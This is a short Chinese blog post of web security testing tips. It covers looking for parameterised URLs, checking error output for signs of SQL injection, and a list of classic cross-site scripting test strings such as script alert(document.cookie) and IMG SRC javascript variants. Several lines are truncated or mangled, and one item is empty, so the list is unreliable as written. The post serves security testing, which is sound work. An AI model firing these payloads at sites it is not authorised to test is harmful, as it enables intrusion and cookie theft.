全部博文(87)
分类: Windows平台
2015-09-06 17:48:07
1、当你找不到有输入行为的页面时,可以尝试找一些带有某些参数的特殊的URL,如 />
<scrīpt>alert(document.cookie)</scrīpt>
2、
3、最后,验证是否能入侵成功或是出错的信息是否包含关于数据库服务器
的相关信息;如果 能说明存在SQL安 全漏洞.
4、XSS测试?
='><scrīpt>alert(document.cookie)</scrīpt>
<scrīpt>alert(document.cookie)</scrīpt>
"<IMG SRC=java\0scrīpt:alert(\"XSS\")>";' > out
<IMG SRC=" javascrīpt:alert('XSS');">
<scrīpt =">" SRC="īpt>
<scrīpt a=">" ''
SRC="īpt>